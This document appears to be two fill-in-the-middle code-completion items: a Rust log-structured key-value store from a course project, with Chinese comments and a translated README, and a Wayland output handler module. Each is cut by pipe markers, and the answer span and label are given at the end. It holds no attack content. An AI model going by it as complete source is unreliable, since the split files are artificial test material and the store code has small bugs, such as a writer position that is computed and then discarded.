/// ref: https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
path: PathBuf,
// 数字到文件的映射
readers: HashMap<u64, BufReaderWithPos<File>>,
// 当前用于写的日志文件
writer: BufWriterWithPos<File>,
// 存在内存中的索引
index: BTreeMap<String, CommandPos>,
// inner: Arc<RwLock<IndexMap<Vec<u8>, Vec<u8>>>>,
/// 记录当前所写入的文件标号
current_gen: u64,
/// 记录过期/无效的(可被删除的)值的字节数量
uncompacted: u64,
}
#[derive(Debug)]
struct BufWriterWithPos<W: Write + Seek> {
writer: BufWriter<W>,
pos: u64,
}
impl<W: Write + Seek> BufWriterWithPos<W> {
fn new(mut inner: W) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0));
Ok(BufWriterWithPos {
writer: BufWriter::new(inner),
pos: 0,
})
}
}
impl<W: Write + Seek> Write for BufWriterWithPos<W> {
fn write(&mut self, buf: &[u8]) -> std::io::Result<usize> {
let len = self.writer.write(buf)?;
self.pos += len as u64;
Ok(len)
}
fn flush(&mut self) -> std::io::Result<()> {
self.writer.flush()
}
}
struct BufReaderWithPos<R: Read + Seek> {
reader: BufReader<R>,
pos: u64,
}
impl<R: Read + Seek> BufReaderWithPos<R> {
fn new(mut inner: R) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0))?;
Ok(BufReaderWithPos {
reader: BufReader::new(inner),
pos,
})
}
}
// 将目录中的文件列表按名字进行排序,以便得到有序的日志文件列表
fn sorted_gen_list(path: PathBuf) -> Result<Vec<u64>> {
let mut gen_list: Vec<u64> = std::fs::read_dir(&path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file() && path.extension() == Some("log".as_ref()))
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.trim_end_matches(".log"))
.map(str::parse::<u64>)
})
.flatten()
.collect();
gen_list.sort_unstable();
Ok(gen_list)
}
fn log_path(dir: &Path, gen: u64) -> PathBuf {
dir.join(format!("{}.log", gen))
}
/// 通过文件序号,从对应的文件中读取指令并生成对应的索引加载到内存中(BTreeMap)
fn load(
gen: u64,
reader: &mut BufReaderWithPos<File>,
index: &mut BTreeMap<String, CommandPos>,
) -> Result<u64> {
// 确定从文件的某个位置开始读
let mut pos = reader.seek(SeekFrom::Start(0))?;
let mut stream = Deserializer::from_reader(reader).into_iter::<Command>();
// 通过压缩的手段可节省的字节数
let mut uncompacted = 0;
while let Some(cmd) = stream.next() {
// 匹配到下一条指令所对应的 offset
let new_pos = stream.byte_offset() as u64;
match cmd? {
Command::Set { key, .. } => {
if let Some(old_cmd) = index.insert(key, (gen, pos..new_pos).into()) {
uncompacted += old_cmd.len;
}
}
// 删除
Command::Remove { key } => {
if let Some(old_cmd) = index.remove(&key) {
uncompacted += old_cmd.len;
}
// 为何加上了指令的长度?todo
uncompacted += new_pos - pos;
}
}
pos = new_pos;
}
Ok(uncompacted)
}
#[derive(Debug, Deserialize, Serialize)]
enum Command {
Set { key: String, value: String },
Remove { key: String },
}
/// 定义支持的指令/日志
impl Command {
fn set(key: String, value: String) -> Self {
Command::Set { key, value }
}
fn remove(key: String) -> Self {
Command::Remove { key }
}
}
/// 命令位置
#[derive(Debug)]
struct CommandPos {
/// 日志文件序号
gen: u64,
/// 日志在一个文件中的偏移量
pos: u64,
/// 日志的长度。一个指令就算是一条日志
len: u64,
}
impl From<(u64, Range<u64>)> for CommandPos {
fn from((gen, range): (u64, Range<u64>)) -> Self {
CommandPos {
gen,
pos: range.start,
len: range.end - range.start,
}
}
}
impl<R: Seek + Read> Seek for BufReaderWithPos<R> {
fn seek(&mut self, pos: SeekFrom) -> std::io::Result<u64> {
self.pos = self.reader.seek(pos)?;
Ok(self.pos)
}
}
impl<R: Seek + Read> Read for BufReaderWithPos<R> {
fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
let len = self.reader.read(buf)?;
self.pos += len as u64;
Ok(len)
}
}
impl KVStore {
/// 基于一个路径启动一个 KvStore 实例。
/// 如果路径不存在,则创建
fn open(path: impl Into<PathBuf>) -> | ult<Self> {
// 打开目录,查看目录中的日志文件列表,将其加载进 kvs
let using_path = path.into();
std::fs::create_dir_all(&using_path)?;
let mut readers = HashMap::new();
// 索引以 btree map 的形式存储在内存中
let mut index: BTreeMap<String, CommandPos> = BTreeMap::new();
let gen_list = sorted_gen_list(using_path.clone())?;
let mut uncompacted = 0;
for &gen in &gen_list {
let mut reader = BufReaderWithPos::new(File::open(log_path(&using_path, gen))?)?;
uncompacted += load(gen, &mut reader, &mut index)?;
readers.insert(gen, reader);
}
let current_gen = gen_list.last().unwrap_or(&0) + 1;
let writer = new_log_file(&using_path, current_gen, &mut readers)?;
Ok(KVStore {
path: using_path.clone(),
readers,
writer,
index,
current_gen,
uncompacted,
})
}
/// 设定键值对
/// 1.序列化指令,刷入文件中;2.索引写入内存
fn set(&mut self, k: String, v: String) -> Result<()> {
let cmd = Command::set(k, v);
let pos = self.writer.pos;
serde_json::to_writer(&mut self.writer, &cmd)?;
self.writer.flush()?;
// 索引写入内存 todo
if let Command::Set { key, .. } = cmd {
if let Some(old_cmd) = self
.index
.insert(key, (self.current_gen, pos..self.writer.pos).into())
{
self.uncompacted += old_cmd.len;
}
}
Ok(())
}
/// 读取值
/// 如果key存在则返回值,不存在,返回 None
fn get(&mut self, k: String) -> Result<Option<String>> {
if let Some(cmd_pos) = self.index.get(&k) {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("Cannot find log reader");
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
let cmd_reader = reader.take(cmd_pos.len);
if let Command::Set { value, .. } = serde_json::from_reader(cmd_reader)? {
Ok(Some(value))
} else {
Err(KvsError::UnsupportCmdType)
}
} else {
Ok(None)
}
}
/// 查询 key 是否存在,如果存在,则记录 cmd 到日志,然后删除文件中的数据,再索引索引
fn delete(&mut self, k: String) -> Result<()> {
if self.index.contains_key(&k) {
let rm_cmd = Command::remove(k.clone());
serde_json::to_writer(&mut self.writer, &rm_cmd)?;
self.writer.flush()?;
if let Command::Remove { key } = rm_cmd {
let old_cmd = self.index.remove(&key).expect("rm key error.");
self.uncompacted += old_cmd.len;
}
Ok(())
} else {
Err(KvsError::KeyNotFound)
}
}
/// 压缩过期的不必要的数据指令
fn compact(&mut self) -> Result<()> {
let compaction_gen = self.current_gen + 1;
self.current_gen += 2;
self.writer = self.new_log_file(self.current_gen)?;
let mut compaction_writer = self.new_log_file(compaction_gen)?;
let mut new_pos = 0;
for cmd_pos in &mut self.index.values_mut() {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("cann't find log reader");
if reader.pos != cmd_pos.pos {
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
}
let mut entry_reader = reader.take(cmd_pos.len);
let len = std::io::copy(&mut entry_reader, &mut compaction_writer)?;
*cmd_pos = (compaction_gen, new_pos..new_pos + len).into();
new_pos += len;
}
compaction_writer.flush()?;
// 删除过期的日志文件
let stale_gens: Vec<_> = self
.readers
.keys()
.filter(|&&gen| gen < compaction_gen)
.cloned()
.collect();
for stale_gen in stale_gens {
self.readers.remove(&stale_gen);
std::fs::remove_file(log_path(&self.path, stale_gen))?;
}
self.uncompacted = 0;
Ok(())
}
fn new_log_file(&mut self, gen: u64) -> Result<BufWriterWithPos<File>> {
new_log_file(&self.path, gen, &mut self.readers)
}
}
// 读取一个目录下的文件
fn read_dir(path: &str) -> Result<Vec<String>> {
// Rust 实现浏览文件
let dirs: Vec<String> = std::fs::read_dir(path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file())
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.to_string())
})
.collect();
dbg!(&dirs);
Ok(dirs)
}
fn create_dir(path: &str) -> Result<bool> {
std::fs::create_dir_all(path)?;
Ok(true)
}
/// 日志文件的创建
fn new_log_file(
path: &Path,
gen: u64,
readers: &mut HashMap<u64, BufReaderWithPos<File>>,
) -> Result<BufWriterWithPos<File>> {
let path = log_path(&path, gen);
let writer = BufWriterWithPos::new(
std::fs::OpenOptions::new()
.create(true)
.write(true)
.append(true)
.open(&path)?,
)?;
readers.insert(gen, BufReaderWithPos::new(File::open(&path)?)?);
Ok(writer)
}
#[cfg(test)]
mod tests {
use std::{fmt::Result, str::FromStr};
use super::*;
#[test]
fn test_store1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".into();
st.set(cache_key.clone(), "hello org".to_string());
assert_eq!(st.get(cache_key.to_string()).unwrap(), Some("hello org".to_string()));
}
#[test]
fn test_load1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".to_string();
dbg!(st.get(cache_key.to_string()).unwrap());
}
#[test]
// fn test_store_delete() {
// let mut st = KVStore::new();
// let cache_key: Vec<u8> = "org_1001_info".as_bytes().into();
// st.set(cache_key.clone(), "hello org".as_bytes().into());
// assert_eq!(st.delete(&cache_key), Some("hello org".as_bytes().into()));
// assert_eq!(st.get(&cache_key), None);
// }
#[test]
fn test_sorted_gen_list() {
let res = sorted_gen_list(PathBuf::from("./"));
dbg!(&res);
}
#[test]
fn test_serde() {
// 通过 serde_json 可以实现“流”方式的贪婪匹配对象(反序列化)
let data = b"[10] [1] [2]";
let de = serde_json::Deserializer::from_slice(data);
let mut stream = de.into_iter::<Vec<i32>>();
dbg!(stream.byte_offset()); // 0
dbg!(stream.next()); // Some([10])
dbg!(stream.byte_offset()); // 4
dbg!(stream.next()); // Some([1])
dbg!(stream.byte_offset()); // 8
dbg!(stream.next()); // Some([2])
dbg!(stream.byte_offset()); // 12
}
#[test]
fn test_read_dir() {
let res = read_dir("./");
assert!(res.is_ok());
}
#[test]
fn test_create_dir() {
// 执行时,`./` 指的是项目根目录
let res = create_dir("./test-dir");
assert!(res.is_ok());
}
#[test]
fn test_new_log_file() {
let mut hs: HashMap<u64, BufReaderWithPos<File>> = HashMap::new();
let res = new_log_file(Path::new("./data"), 0, &mut hs);
dbg!(res);
}
#[test]
fn test_command_pos() {
// Into trait 的使用和了解
let c1: CommandPos = (1, 2..17).into();
dbg!(c1);
}
}
/*
>* 资料来源:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
### 部分 1:错误处理
在这个项目中,I/O 错误会导致代码执行失败。因此,在完全实现数据库之前,我们还需要确定一件
至关重要的事:错误处理策略。
Rust 的错误处理很强大,但需要以合适的方式使用多个样板文件,而对于这个项目,failure 库将提供便捷的错误处理工具。
failure 库的指南中描述了几种错误处理模式。
我们选择其中一种策略,然后在库中可以定义自己的错误类型,也可以导入其他 Error。这个策略对应的错误类型将会在项目中的 Result 中使用,
可以使用 `?` 操作符把其他库中的错误类型转换为自己库的错误类型。
这样,为 Result 定义一个含有错误类型的类型别名,编码时就不需要到处输入 Result<T, YourErrorType>,而可以简单的输入 Result。这是一种非常常见的 Rust 模式。
最后,使用 use 语句将这些类型导入到代码中,然后将 main 函数的签名的返回值部分修改为 `Result<()>`。
运行 `cargo check` 可以用编译器检查错误,然后修复这些错误。现在可以先使用 `panic!()` 来结束 `main` 函数,从而通过编译。
在前进之前,先确定好你的错误处理策略。
与之前的项目一样,你可以创建用于占位的数据结构和方法,以便跑通测试用例。现在你定义一个错误类型,这很简单。然后在所有需要编译测试用例的地方添加 panic(`cargo test --no-run`)。
注意:Rust 中的“错误处理”仍在发展和改进中。本课程目前使用 [`failure`](https://docs.rs/failure/0.1.5/failure/) 库定义错误类型更容易。虽然 `failure` 设计不错,但它的使用[不是最佳实践](https://github.com/rust-lang-nursery/rust-cookbook/issues/502#issue-387418261)。Rust 专家可能会开发出更好的错误处理方式。
在后面的课程中有可能不会一直使用 `failure`。于此同时,它也是一个不错的选择,它能用于学习 Rust 错误处理的演进以及优化。
### 部分 2:log 的作用和原理
现在我们终于要开始从磁盘读写来实现一个真正的数据库。我们将使用 [serde](https://serde.rs/) 来把 "set" 和 "rm" 指令序列化为字符串,然后用标准的文件 I/O 接口来写到硬盘上。
下面这些是 `kvs` 最基本的日志行文:
* "set"
* 用户调用 `kvs set mykey myvalue`
* `kvs` 创建 set 指令包含的值,其中有 key 和 value
* 然后,程序将指令序列化为 `String`
* 然后,把序列化的指令追加到日志文件中
* 如果成功了,则以错误码 0 静默地退出
* 如果失败了,就打印错误,并返回非 0 地错误代码并退出
* "get"
* 用户调用指令:`kvs get mykey`
* kvs 每次读取一条指令,将相应受影响的 key 和文件偏移量记录到内存的 map 中,即 key -> 日志指针
* 然后,检查 map 中的日志指针
* 如果失败,则打印“Key not found”,并以代码 0 退出
* 如果成功
* 它将指令日志反序列化得到最后的记录中的 key 和值
* 然后将结果打印到标准输出,并以代码 0 退出
* "rm"
* 用户调用指令 `kvs rm mykey`
* 和 get 指令一样,kvs 读取整条日志来在内存中构建索引
* 然后,它检查 map 中是否存在给定的 key
* 如果不存在,就返回“Key not found”
* 如果成功,将会创建对应的 rm 指令,其中包含了 key
* 然后将指令序列化后追加到日志中
* 如果成功,则以错误码 0 静默退出
日志是提交到数据库的事务记录。通过在启动时,“重建”(replaying)日志中的记录,我们就可以重现数据库在某个时间点的特定状态。
在这个迭代中,你可以将键的值直接存储在内存中(因此在重启或重建时是不会从日志中读取内容的)。在后面的迭代中,只需将日志指针(文件偏移量)存储到日志中。
### 部分 3:log 的写入
我们将从 set 开始。接下来将会有很多步骤。但大部分都比较容易实现,你可以通过运行 `cli_*` 相关测试用例来验证你的实现。
`serde` 是一个大型库,有许多功能选项,支持多种序列化格式。基本的序列化和反序列化只需要对结构体进行合适的注解,然后调用一个函数将序列化后的内容写入 `String` 或者 `Write` 流。
你需要选择一种序列化格式。并确定你需要的属性 —— 你是否需要性能优先?你希望以纯文本形式读取日志内容吗?这都在于你如何配置,但你记得在代码中写好注释。
还有其他因素要考虑一下:系统在哪设置缓冲,以及哪些地方需要?缓冲后续的影响是什么?何时打开和关闭文件句柄?有哪些支持的命令?`KvStore` 的生命周期是什么?
你调用的一些 api 可能会失败,并返回错误类型的 `Result`。你需要确保调用函数会返回你自己设定的错误类型的 `Result`,并用 `?` 向上传递。
类似于 rm 命令,我们希望在把命令写入日志之前,还要检查 key 是否存在。因为两种场景需要区分开,所以可以使用 enum 类型的变体来统一所有命令。`serde` 可以完美地与枚举一起使用。
你现在可以实现 set 和 rm 命令了,重点放在 set / rm 对应的测试用例上,也可以阅读下一节的 get 命令实现。记住这两个命令并加以实现,会对你很有帮助。选择权在你。
### 部分 4:log 的读取
现在该实现 get 了。在这一部分中,你不需要把日志指针存储在索引中,而将其放到下一节进行实现。这一节我们只需在启动时,读取日志中的所有命令,执行它们将每个键值对保存在内存中。然后根据需要从内存中读取。
应该一次性把日志内容全部读取到内存中并通过 map 类型来重现数据吗;需要在某个时候读取一条日志从而重现 map 中的某条数据吗?应该在序列化、反序列化之前将其从文件系统中读取到 buffer 中吗?想想你使用内存的方式。考虑一下与内核交互是否是从 I/O 流读取数据。
记住,"get" 可能获取不到值,这种情况下,需要特殊处理。这里,我们的 API 返回 `None`,然后客户端打印一个特定的消息,并以零代码退出。
读取日志有一个复杂点,你在编写 set 时,可能已经想到了:如何区分日志中的记录?也就是说,如何终止读取,何时开始读取下一条记录?需要这样实现吗?也许 serde 将直接从 I/O 流中序列化一条记录,并在操作完后停止读取,将游标停留在正确的位置,以便读取后续的记录。也许 serde 在检查到两条背靠背(back-to-back)的记录时会报错。也许你需要插入额外的信息来区分每个记录的长度,也有可能有其他方式。
_现在要实现 “get” 了_
### 部分 5:在索引中存储 log 的指针
此时,除压缩数据相关的测试以外,其他测试应该都是通过的。接下来的步骤是一些性能优化和存储优化。当你实现它们时,需要注意它们的意义是什么?
正如我们前面描述的那样,我们所实现的数据库是在内存中维护所有的 key 索引。这个索引映射到字符串指针(值内容),而非 key 本身的内容。
这个更改就需要我们可以从任意偏移量处读取日志。想一想,这将怎样影响我们对文件的处理。
如果在前面的步骤中,你选择将字符串直接存在内存中,那现在需要调整代码为存储日志指针的方式,并根据需要从磁盘中加载内容。
### 部分 6:KvStore 的有状态和无状态
请记住,我们的项目不仅是一个库,也可作为命令行程序。它们有些不一样:kvs 命令行程序向磁盘提交一个更改,然后就退出了(无状态);KvStore 会将更改提交到磁盘,然后常驻内存以服务后续的查询(有状态)。
你的 KvStore 是有状态还是无状态呢?
可以让你的 KvStore 的索引常驻内存中,这样就无需在每次调用时重新执行所有的日志指令。
### 部分 7:log 的压缩
到这里,数据库运行是正常的,但日志会无限增长。这对其他数据库可能没啥影响,但对于我们正在构建的数据库 —— 我们需要尽量减少磁盘的占用。
因此,最后一步就是压缩日志了。需要考虑到随着日志的增长,可能有多个指令日志对同一个键操作。还要考虑到,对于同一个键,只有最近一次的日志的更改才对其值有影响:
索引序号 | 指令
|:---- |:--- |
| 0 | ~~Command::Set("key-1", "value-1a")~~ |
| 20 | Command::Set("key-2", "value-2") |
| | ... |
| 100 | Command::Set("key-1", "value-1b") |
在这个例子中,索引 0 的日志很明显是冗余的,因此不需要对其存储。日志压缩其实就是重新构建日志并且消除冗余:
索引序号 | 指令
|:---- |:--- |
| 0 | Command::Set("key-2", "value-2") |
| | ... |
| 99 | Command::Set("key-1", "value-1b") |
这是基本的压缩算法的使用:
如何重建日志取决于你。考虑一下这个问题:最原始的方法是什么?需要多少内存?压缩日志所需的最小拷贝量是多少?能实时压缩吗?如果压缩失败,怎样保证数据完整性?
到目前为止,我们一直致力于“日志”的处理,但实际上,数据库的数据存储在多个日志文件中是很常见的。如果你将日志拆分到多个文件中,你可能会发现压缩日志更容易。
给数据库实现日志压缩。
恭喜!你已经编写了一个功能齐全的数据库了。
如果你很好奇,你可以将你实现的数据库的性能与其他数据库(如 sled、bitcask、badger 或 RicksDB)进行性能对比。你可能喜欢研究它们实现的架构,将其与你自己的架构对比,以及架构的不同对性能有何影响。接下来的几个项目将为你提供优化的机会。
写的很棒,朋友。可以休息一下了。
*/
| Res | identifier_name |
output.rs | //! Types and functions related to graphical outputs
//!
//! This modules provides two main elements. The first is the
//! [`OutputHandler`](struct.OutputHandler.html) type, which is a
//! [`MultiGlobalHandler`](../environment/trait.MultiGlobalHandler.html) for
//! use with the [`init_environment!`](../macro.init_environment.html) macro. It is automatically
//! included if you use the [`new_default_environment!`](../macro.new_default_environment.html).
//!
//! The second is the [`with_output_info`](fn.with_output_info.html) with allows you to
//! access the information associated to this output, as an [`OutputInfo`](struct.OutputInfo.html).
use std::{
cell::RefCell,
rc::{self, Rc},
sync::{self, Arc, Mutex},
};
use wayland_client::{
protocol::{
wl_output::{self, Event, WlOutput},
wl_registry,
},
Attached, DispatchData, Main,
};
pub use wayland_client::protocol::wl_output::{Subpixel, Transform};
/// A possible mode for an output
#[derive(Copy, Clone, Debug)]
pub struct Mode {
/// Number of pixels of this mode in format `(width, height)`
///
/// for example `(1920, 1080)`
pub dimensions: (i32, i32),
/// Refresh rate for this mode, in mHz
pub refresh_rate: i32,
/// Whether this is the current mode for this output
pub is_current: bool,
/// Whether this is the preferred mode for this output
pub is_preferred: bool,
}
#[derive(Clone, Debug)]
/// Compiled information about an output
pub struct OutputInfo {
/// The ID of this output as a global
pub id: u32,
/// The model name of this output as advertised by the server
pub model: String,
/// The make name of this output as advertised by the server
pub make: String,
/// Location of the top-left corner of this output in compositor
/// space
///
/// Note that the compositor may decide to always report (0,0) if
/// it decides clients are not allowed to know this information.
pub location: (i32, i32),
/// Physical dimensions of this output, in unspecified units
pub physical_size: (i32, i32),
/// The subpixel layout for this output
pub subpixel: Subpixel,
/// The current transformation applied to this output
///
/// You can pre-render your buffers taking this information
/// into account and advertising it via `wl_buffer.set_tranform`
/// for better performances.
pub transform: Transform,
/// The scaling factor of this output
///
/// Any buffer whose scaling factor does not match the one
/// of the output it is displayed on will be rescaled accordingly.
///
/// For example, a buffer of scaling factor 1 will be doubled in
/// size if the output scaling factor is 2.
pub scale_factor: i32,
/// Possible modes for an output
pub modes: Vec<Mode>,
/// Has this output been unadvertized by the registry
///
/// If this is the case, it has become inert, you might want to
/// call its `release()` method if you don't plan to use it any
/// longer.
pub obsolete: bool,
}
impl OutputInfo {
fn new(id: u32) -> OutputInfo {
OutputInfo {
id,
model: String::new(),
make: String::new(),
location: (0, 0),
physical_size: (0, 0),
subpixel: Subpixel::Unknown,
transform: Transform::Normal,
scale_factor: 1,
modes: Vec::new(),
obsolete: false,
}
}
}
type OutputCallback = dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync;
enum OutputData {
Ready { info: OutputInfo, callbacks: Vec<sync::Weak<OutputCallback>> },
Pending { id: u32, events: Vec<Event>, callbacks: Vec<sync::Weak<OutputCallback>> },
}
type OutputStatusCallback = dyn FnMut(WlOutput, &OutputInfo, DispatchData) + 'static;
/// A handler for `wl_output`
///
/// This handler can be used for managing `wl_output` in the
/// [`init_environment!`](../macro.init_environment.html) macro, and is automatically
/// included in [`new_default_environment!`](../macro.new_default_environment.html).
///
/// It aggregates the output information and makes it available via the
/// [`with_output_info`](fn.with_output_info.html) function.
pub struct OutputHandler {
outputs: Vec<(u32, Attached<WlOutput>)>,
status_listeners: Rc<RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>>,
}
impl OutputHandler {
/// Create a new instance of this handler
pub fn new() -> OutputHandler {
OutputHandler { outputs: Vec::new(), status_listeners: Rc::new(RefCell::new(Vec::new())) }
}
}
impl crate::environment::MultiGlobalHandler<WlOutput> for OutputHandler {
fn created(
&mut self,
registry: Attached<wl_registry::WlRegistry>,
id: u32,
version: u32,
_: DispatchData,
) {
// We currently support wl_output up to version 3
let version = std::cmp::min(version, 3);
let output = registry.bind::<WlOutput>(version, id);
if version > 1 {
// wl_output.done event was only added at version 2
// In case of an old version 1, we just behave as if it was send at the start
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Pending { id, events: vec![], callbacks: vec![] })
});
} else {
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Ready { info: OutputInfo::new(id), callbacks: vec![] })
});
}
let status_listeners_handle = self.status_listeners.clone();
output.quick_assign(move |output, event, ddata| {
process_output_event(output, event, ddata, &status_listeners_handle)
});
self.outputs.push((id, (*output).clone()));
}
fn removed(&mut self, id: u32, mut ddata: DispatchData) {
let status_listeners_handle = self.status_listeners.clone();
self.outputs.retain(|(i, o)| {
if *i != id {
true
} else {
make_obsolete(o, ddata.reborrow(), &status_listeners_handle);
false
}
});
}
fn get_all(&self) -> Vec<Attached<WlOutput>> {
self.outputs.iter().map(|(_, o)| o.clone()).collect()
}
}
fn process_output_event(
output: Main<WlOutput>,
event: Event,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
if let Event::Done = event {
let (id, pending_events, mut callbacks) =
if let OutputData::Pending { id, events: ref mut v, callbacks: ref mut cb } = *udata {
(id, std::mem::replace(v, vec![]), std::mem::replace(cb, vec![]))
} else {
// a Done event on an output that is already ready => nothing to do
return;
};
let mut info = OutputInfo::new(id);
for evt in pending_events {
merge_event(&mut info, evt);
}
notify(&output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
} else {
match *udata {
OutputData::Pending { events: ref mut v, .. } => v.push(event),
OutputData::Ready { ref mut info, ref mut callbacks } => {
merge_event(info, event);
notify(&output, info, ddata, callbacks);
}
}
}
}
fn make_obsolete(
output: &Attached<WlOutput>,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
let (id, mut callbacks) = match *udata {
OutputData::Ready { ref mut info, ref mut callbacks } => {
info.obsolete = true;
notify(output, info, ddata.reborrow(), callbacks);
notify_status_listeners(&output, info, ddata, listeners);
return;
}
OutputData::Pending { id, callbacks: ref mut cb, .. } => {
(id, std::mem::replace(cb, vec![]))
}
};
let mut info = OutputInfo::new(id);
info.obsolete = true;
notify(output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
}
fn | (info: &mut OutputInfo, event: Event) {
match event {
Event::Geometry {
x,
y,
physical_width,
physical_height,
subpixel,
model,
make,
transform,
} => {
info.location = (x, y);
info.physical_size = (physical_width, physical_height);
info.subpixel = subpixel;
info.transform = transform;
info.model = model;
info.make = make;
}
Event::Scale { factor } => {
info.scale_factor = factor;
}
Event::Mode { width, height, refresh, flags } => {
let mut found = false;
if let Some(mode) = info
.modes
.iter_mut()
.find(|m| m.dimensions == (width, height) && m.refresh_rate == refresh)
{
// this mode already exists, update it
mode.is_preferred = flags.contains(wl_output::Mode::Preferred);
mode.is_current = flags.contains(wl_output::Mode::Current);
found = true;
}
if !found {
// otherwise, add it
info.modes.push(Mode {
dimensions: (width, height),
refresh_rate: refresh,
is_preferred: flags.contains(wl_output::Mode::Preferred),
is_current: flags.contains(wl_output::Mode::Current),
})
}
}
// ignore all other events
_ => (),
}
}
fn notify(
output: &WlOutput,
info: &OutputInfo,
mut ddata: DispatchData,
callbacks: &mut Vec<sync::Weak<OutputCallback>>,
) {
callbacks.retain(|weak| {
if let Some(arc) = sync::Weak::upgrade(weak) {
(*arc)(output.clone(), info, ddata.reborrow());
true
} else {
false
}
});
}
fn notify_status_listeners(
output: &Attached<WlOutput>,
info: &OutputInfo,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
// Notify the callbacks listening for new outputs
listeners.borrow_mut().retain(|lst| {
if let Some(cb) = rc::Weak::upgrade(lst) {
(&mut *cb.borrow_mut())(output.detach(), info, ddata.reborrow());
true
} else {
false
}
})
}
/// Access the info associated with this output
///
/// The provided closure is given the [`OutputInfo`](struct.OutputInfo.html) as argument,
/// and its return value is returned from this function.
///
/// If the provided `WlOutput` has not yet been initialized or is not managed by SCTK, `None` is returned.
///
/// If the output has been removed by the compositor, the `obsolete` field of the `OutputInfo`
/// will be set to `true`. This handler will not automatically detroy the output by calling its
/// `release` method, to avoid interfering with your logic.
pub fn with_output_info<T, F: FnOnce(&OutputInfo) -> T>(output: &WlOutput, f: F) -> Option<T> {
if let Some(ref udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Ready { ref info, .. } => Some(f(info)),
OutputData::Pending { .. } => None,
}
} else {
None
}
}
/// Add a listener to this output
///
/// The provided closure will be called whenever a property of the output changes,
/// including when it is removed by the compositor (in this case it'll be marked as
/// obsolete).
///
/// The returned [`OutputListener`](struct.OutputListener) keeps your callback alive,
/// dropping it will disable the callback and free the closure.
pub fn add_output_listener<F: Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>(
output: &WlOutput,
f: F,
) -> OutputListener {
let arc = Arc::new(f) as Arc<_>;
if let Some(udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let mut udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Pending { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
OutputData::Ready { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
}
}
OutputListener { _cb: arc }
}
/// A handle to an output listener callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputListener {
_cb: Arc<dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>,
}
/// A handle to an output status callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputStatusListener {
_cb: Rc<RefCell<OutputStatusCallback>>,
}
/// Trait representing the OutputHandler functions
///
/// Implementing this trait on your inner environment struct used with the
/// [`environment!`](../macro.environment.html) by delegating it to its
/// [`OutputHandler`](struct.OutputHandler.html) field will make available the output-associated
/// method on your [`Environment`](../environment/struct.Environment.html).
pub trait OutputHandling {
/// Insert a listener for output creation and removal events
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener;
}
impl OutputHandling for OutputHandler {
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener {
let rc = Rc::new(RefCell::new(f)) as Rc<_>;
self.status_listeners.borrow_mut().push(Rc::downgrade(&rc));
OutputStatusListener { _cb: rc }
}
}
impl<E: OutputHandling> crate::environment::Environment<E> {
/// Insert a new listener for outputs
///
/// The provided closure will be invoked whenever a `wl_output` is created or removed.
///
/// Note that if outputs already exist when this callback is setup, it'll not be invoked on them.
/// For you to be notified of them as well, you need to first process them manually by calling
/// `.get_all_outputs()`.
///
/// The returned [`OutputStatusListener`](../output/struct.OutputStatusListener.hmtl) keeps your
/// callback alive, dropping it will disable it.
#[must_use = "the returned OutputStatusListener keeps your callback alive, dropping it will disable it"]
pub fn listen_for_outputs<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&self,
f: F,
) -> OutputStatusListener {
self.with_inner(move |inner| OutputHandling::listen(inner, f))
}
}
impl<E: crate::environment::MultiGlobalHandler<WlOutput>> crate::environment::Environment<E> {
/// Shorthand method to retrieve the list of outputs
pub fn get_all_outputs(&self) -> Vec<WlOutput> {
self.get_all_globals::<WlOutput>().into_iter().map(|o| o.detach()).collect()
}
}
| merge_event | identifier_name |
